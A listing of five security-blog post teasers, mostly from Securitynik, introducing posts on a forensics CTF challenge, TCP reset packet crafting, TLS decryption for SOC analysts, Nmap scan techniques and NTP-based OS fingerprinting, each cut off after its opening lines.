- Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego - Securitynik
At work, we develop and run various Cyber Security challenges to help the Analyst (and the rest of the team) to rapidly build and demonstrate their skillset. This challenge was put together by one of our Managers Jean. I thought this was an interesting challenge that covered a number of areas. As a result, I […]
- Packet Crafting - Tearing down a connection with TCP Reset - Securitynik
In a previous post, I crafted a TCP 3-way handshake, to setup a connection with a remote device. In this post, we are going to sniff traffic between two devices and send a RST packet to tear down the connection. Think about what your IPS does as you go through this post. First up, the […]
- Understanding and Decrypting TLS based communication - HTTP over TLS (HTTPS) - Securitynik
As a leader in a SOC at a Managed Security Services Provider (MSSP), leading multiple teams, it is always interesting to see how new analysts may freeze when they hear the communication is encrypted. What many of these new analysts do not know, is in some cases, you may be able to decrypt this communication. […]
- Understanding NMAP's scan techniques: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans - Securitynik
A member of the Toronto Metropolitan University/Rogers Cybersecure Catalyst program, a program I’m currently a mentor for, was using Nmap and could not really see the difference when using the -sW and -sM scan techniques. To help that student and others using Nmap, I thought I should put together a quick blog post. Before getting into […]
- Its about time: OS Fingerprinting using NTP - Dr. J
Most current operating systems, including many small systems like IoT devices, use some form of NTP to sync time. NTP is lightweight and reasonably accurate in most use cases to synchronize time across the internet with millisecond accuracy [1]. Some protocols, like PTP, are more accurate but are designed for local networks and may require […]